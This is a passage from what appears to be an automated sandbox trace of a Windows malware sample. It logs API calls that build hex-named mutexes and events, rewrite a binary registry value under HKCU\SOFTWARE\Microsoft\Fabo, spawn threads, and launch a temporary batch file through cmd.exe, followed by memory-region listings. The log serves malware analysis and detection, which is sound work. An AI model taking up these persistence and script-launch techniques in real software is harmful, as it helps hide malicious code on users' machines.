pszDest="02") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="6F") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="4B") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="DA") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="97") returned 2 [0124.916] CreateMutexW (lpMutexAttributes=0x5ce89c, bInitialOwner=0, lpName="D5000000C70E48D5408251026F4BDA97") returned 0x144 [0124.917] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0124.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x65f062, cbMultiByte=4, lpWideCharStr=0x5d1060, cchWideChar=10 | out: lpWideCharStr="Fabo") returned 4 [0124.917] PathCombineW (in: pszDest=0x5d0ff8, pszDir="SOFTWARE\\Microsoft", pszFile="Fabo" | out: pszDest="SOFTWARE\\Microsoft\\Fabo") returned="SOFTWARE\\Microsoft\\Fabo" [0124.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x65f080, cbMultiByte=6, lpWideCharStr=0x5d1060, cchWideChar=10 | out: lpWideCharStr="Vipoug") returned 6 [0124.917] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x65f084 | out: phkResult=0x65f084*=0x180) returned 0x0 [0124.917] RegQueryValueExW (in: hKey=0x180, lpValueName="Vipoug", lpReserved=0x0, lpType=0x65f0ac, lpData=0x0, lpcbData=0x65f094*=0x0 | out: lpType=0x65f0ac*=0x3, lpData=0x0, lpcbData=0x65f094*=0x220) returned 0x0 [0124.917] RegQueryValueExW (in: hKey=0x180, lpValueName="Vipoug", lpReserved=0x0, lpType=0x65f0ac, lpData=0x4c010a0, lpcbData=0x65f094*=0x220 | out: lpType=0x65f0ac*=0x3, lpData=0x4c010a0*, lpcbData=0x65f094*=0x220) returned 0x0 [0124.918] RegCloseKey (hKey=0x180) returned 0x0 [0124.919] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x65f098, lpdwDisposition=0x0 | out: phkResult=0x65f098*=0x180, lpdwDisposition=0x0) returned 0x0 [0124.919] RegSetValueExW (in: hKey=0x180, lpValueName="Vipoug", Reserved=0x0, dwType=0x3, lpData=0x4c014a8*, cbData=0x220 | out: lpData=0x4c014a8*) returned 0x0 [0124.919] RegCloseKey (hKey=0x180) returned 0x0 [0124.919] ReleaseMutex (hMutex=0x144) returned 1 [0124.919] CloseHandle (hObject=0x144) returned 1 [0124.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5bcbe5, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0124.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5bd254, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x180 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="21") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="85") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="98") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="17") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="73") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="11") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="1C") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="70") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="7E") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="EB") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="60") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="3A") returned 2 [0124.921] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="45") returned 2 [0124.922] CreateEventW (lpEventAttributes=0x5ce89c, bManualReset=1, bInitialState=0, lpName="2100000085981773111C707EEB603A45") returned 0x184 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="A4") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="72") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="DC") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="09") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="59") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="2F") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="53") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="88") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="52") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="EF") returned 2 [0124.922] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="A5") returned 2 [0124.923] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="48") returned 2 [0124.923] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="7D") returned 2 [0124.923] CreateEventW (lpEventAttributes=0x5ce89c, bManualReset=1, bInitialState=0, lpName="A400000072DC09592F538852EFA5487D") returned 0x190 [0124.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5c7027, lpParameter=0x4c120f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0124.923] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="DB") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="28") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="CA") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="BB") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="9C") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="62") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="23") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="B8") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="5B") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="F9") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="AC") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="7B") returned 2 [0124.924] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="71") returned 2 [0124.924] CreateEventW (lpEventAttributes=0x5ce89c, bManualReset=1, bInitialState=0, lpName="DB00000028CABB9C6223B85BF9AC7B71") returned 0x198 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="35") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="00") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="EB") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="29") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="A3") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="17") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="62") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="D8") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="10") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="3A") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="73") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="4C") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="6E") returned 2 [0124.925] wvnsprintfW (in: pszDest=0x65f108, cchDest=6, pszFmt="%02X", arglist=0x65f0e4 | out: pszDest="49") returned 2 [0124.925] CreateEventW (lpEventAttributes=0x5ce89c, bManualReset=1, bInitialState=0, lpName="35000000EB29A31762D8103A734C6E49") returned 0x19c [0124.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5b137e, lpParameter=0x4c12098, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0124.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x5bc238, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x65f3bc | out: lpThreadId=0x65f3bc*=0xd9c) returned 0x1a4 [0124.927] CloseHandle (hObject=0x1a4) returned 1 Thread: id = 10 os_tid = 0xc64 Thread: id = 19 os_tid = 0xd54 Thread: id = 20 os_tid = 0xd58 Thread: id = 29 os_tid = 0xd8c [0124.953] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0124.953] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="C0") returned 2 [0124.953] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="00") returned 2 [0124.953] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="00") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="00") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="84") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="4E") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="E6") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="C4") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="06") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="48") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="47") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="0D") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="34") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="5E") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="7B") returned 2 [0124.954] wvnsprintfW (in: pszDest=0x4dffb00, cchDest=6, pszFmt="%02X", arglist=0x4dffadc | out: pszDest="65") returned 2 [0124.954] CreateMutexW (lpMutexAttributes=0x5ce89c, bInitialOwner=0, lpName="C0000000844EE6C40648470D345E7B65") returned 0xf8 [0124.955] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) Thread: id = 30 os_tid = 0xd90 [0124.955] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0124.955] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="4A") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="00") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="00") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="00") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="AF") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="17") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="36") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="6B") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="F4") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="96") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="0A") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="E6") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="2A") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="76") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="87") returned 2 [0124.956] wvnsprintfW (in: pszDest=0x6b5eb10, cchDest=6, pszFmt="%02X", arglist=0x6b5eaec | out: pszDest="8C") returned 2 [0124.957] CreateMutexW (lpMutexAttributes=0x5ce89c, bInitialOwner=0, lpName="4A000000AF17366BF4960AE62A76878C") returned 0x13c [0124.957] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) Thread: id = 31 os_tid = 0xd94 [0124.957] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0124.957] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x6c5f680 | out: phkResult=0x6c5f680*=0x140) returned 0x0 [0124.957] RegQueryValueExW (in: hKey=0x140, lpValueName="Vipoug", lpReserved=0x0, lpType=0x6c5f6a8, lpData=0x0, lpcbData=0x6c5f690*=0x0 | out: lpType=0x6c5f6a8*=0x3, lpData=0x0, lpcbData=0x6c5f690*=0x220) returned 0x0 [0124.957] RegQueryValueExW (in: hKey=0x140, lpValueName="Vipoug", lpReserved=0x0, lpType=0x6c5f6a8, lpData=0x4c010a0, lpcbData=0x6c5f690*=0x220 | out: lpType=0x6c5f6a8*=0x3, lpData=0x4c010a0*, lpcbData=0x6c5f690*=0x220) returned 0x0 [0124.958] RegCloseKey (hKey=0x140) returned 0x0 [0124.958] WaitForMultipleObjects (nCount=0x3, lpHandles=0x4c120f8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 32 os_tid = 0xd98 [0124.958] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0124.959] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x6d5f3b0 | out: phkResult=0x6d5f3b0*=0x140) returned 0x0 [0124.959] RegQueryValueExW (in: hKey=0x140, lpValueName="Vipoug", lpReserved=0x0, lpType=0x6d5f3d8, lpData=0x0, lpcbData=0x6d5f3c0*=0x0 | out: lpType=0x6d5f3d8*=0x3, lpData=0x0, lpcbData=0x6d5f3c0*=0x220) returned 0x0 [0124.959] RegQueryValueExW (in: hKey=0x140, lpValueName="Vipoug", lpReserved=0x0, lpType=0x6d5f3d8, lpData=0x4c010a0, lpcbData=0x6d5f3c0*=0x220 | out: lpType=0x6d5f3d8*=0x3, lpData=0x4c010a0*, lpcbData=0x6d5f3c0*=0x220) returned 0x0 [0124.959] RegCloseKey (hKey=0x140) returned 0x0 [0124.960] WaitForMultipleObjects (nCount=0x3, lpHandles=0x4c12098*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 33 os_tid = 0xd9c [0124.960] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xffffffff) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x78701000" os_pid = "0xcac" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x990" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"" cur_dir = "C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\" Region: id = 426 start_va = 0xe0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 427 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 428 start_va = 0x110000 end_va = 0x123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 429 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 430 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 431 start_va = 0x9c0000 end_va = 0xa0ffff entry_point = 0x9d34b0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" Region: id = 432 start_va = 0xa10000 end_va = 0x4a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 433 start_va = 0x773d0000 end_va = 0x77548fff entry_point = 0x773d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" Region: id = 434 start_va = 0x7eaf0000 end_va = 0x7eb12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaf0000" filename = "" Region: id = 435 start_va = 0x7eb16000 end_va = 0x7eb16fff entry_point = 0x0 region_type = private name = "private_0x000000007eb16000" filename = "" Region: id = 436 start_va = 0x7eb1b000 end_va = 0x7eb1bfff entry_point = 0x0 region_type = private name = "private_0x000000007eb1b000" filename = "" Region: id = 437 start_va = 0x7eb1d000 end_va = 0x7eb1ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb1d000" filename = "" Region: id = 438 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 439 start_va = 0x7fff0000 end_va = 0x7dfd2ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 440 start_va = 0x7dfd2ef60000 end_va = 0x7ffd2ef5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd2ef60000" filename = "" Region: id = 441 start_va = 0x7ffd2ef60000 end_va = 0x7ffd2f121fff entry_point = 0x7ffd2ef60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 442 start_va = 0x7ffd2f122000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffd2f122000" filename = "" Region: id = 443 start_va = 0x270000 end_va = 0x273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 444 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 445 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 446 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 447 start_va = 0x64da0000 end_va = 0x64e12fff entry_point = 0x64db2f50 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" Region: id = 448 start_va = 0x64e20000 end_va = 0x64e6efff entry_point = 0x64e36ae0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" Region: id = 520 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 521 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 522 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 523 start_va = 0x420000 end_va = 0x4ddfff entry_point = 0x420000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 524 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 525 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 526 start_va = 0x64e70000 end_va = 0x64e77fff entry_point = 0x64e71460 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" Region: id = 527 start_va = 0x745a0000 end_va = 0x7465dfff entry_point = 0x745d5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" Region: id = 528 start_va = 0x76460000 end_va = 0x7654ffff entry_point = 0x764737d0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" Region: id = 529 start_va = 0x76fa0000 end_va = 0x77115fff entry_point = 0x7703c9a0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" Region: id = 530 start_va = 0x7e9f0000 end_va = 0x7eaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9f0000" filename = "" Region: id = 531 start_va = 0x7eb18000 end_va = 0x7eb1afff entry_point = 0x0 region_type = private name = "private_0x000000007eb18000" filename = "" Region: id = 532 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 533 start_va = 0x100000 end_va = 0x103fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 534 start_va = 0x74460000 end_va = 0x74467fff entry_point = 0x74461840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" Region: id = 535 start_va = 0x74470000 end_va = 0x744c8fff entry_point = 0x744a8cc0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" Region: id = 536 start_va = 0x744d0000 end_va = 0x744d9fff entry_point = 0x744d2aa0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" Region: id = 537 start_va = 0x744e0000 end_va = 0x744fdfff entry_point = 0x744eb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" Region: id = 538 start_va = 0x75b70000 end_va = 0x75c1bfff entry_point = 0x75ba36b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" Region: id = 539 start_va = 0x76d70000 end_va = 0x76deafff entry_point = 0x76d8e3b0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" Region: id = 540 start_va = 0x76e90000 end_va = 0x76ed2fff entry_point = 0x76e9f570 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" Thread: id = 11 os_tid = 0xcb0 [0080.436] GetModuleHandleA (lpModuleName=0x0) returned 0x9c0000 [0080.437] __set_app_type (_Type=0x1) [0080.437] __p__fmode () returned 0x74654d6c [0080.437] __p__commode () returned 0x74655b1c [0080.437] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9d36e0) returned 0x0 [0080.440] __getmainargs (in: _Argc=0x9e50e8, _Argv=0x9e50ec, 